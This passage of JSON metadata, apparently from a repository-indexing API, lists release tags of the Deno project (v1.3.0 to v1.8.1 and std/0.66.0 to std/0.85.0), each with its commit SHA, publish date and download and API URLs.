name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/